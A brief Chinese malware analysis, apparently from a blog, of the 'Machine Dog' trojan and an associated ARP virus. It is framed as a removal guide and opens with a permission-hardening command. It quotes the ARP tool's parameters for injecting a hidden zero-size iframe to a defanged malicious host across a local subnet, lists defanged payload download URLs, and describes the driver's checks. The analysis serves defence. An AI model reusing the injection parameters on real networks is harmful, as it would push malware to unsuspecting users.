彻底清除机器狗木马的方法

Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r 

然后释放病毒文件pvc.exe，于192.168.0.1-192.168.0.254网段 

加入框架（病毒）数据包，参数为： 

-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src=’hXXp://xxx.mmma.biz/js.htm’ width=0 height=0></iframe>" 

病毒行为： 

去除pcihdd.sys的文件属性，并删除原有的pcihdd.sys文件夹。 

然后继续下载： 
h**p://xx*.XXXXX.biz/big.exe 
h**p://xx*.XXXX.biz/big1.exe 

哈哈，自始至终终于见到机器狗了（big.exe） 

第2个是上面分析过的ARP病毒，哈哈``54ing``删掉 

再看看那个机器狗，哈``首先检测pcihdd.sys是否存在。 

若不在则注册该驱动，然后判断条件，如果满足以下条件则退出，不做其他操作： 

1、不是启动分区，比如说双系统。 

2、文件系统，哈哈``不会是针对FAT16的吧 

3、如果是NTFS，使用了文件压缩功能，可能导致病毒驱动在计算Userinnt地址时会出现错误？ 

4、读取Userinnt失败（设置权限），这个版本的小狗应该还不至于出现这情况。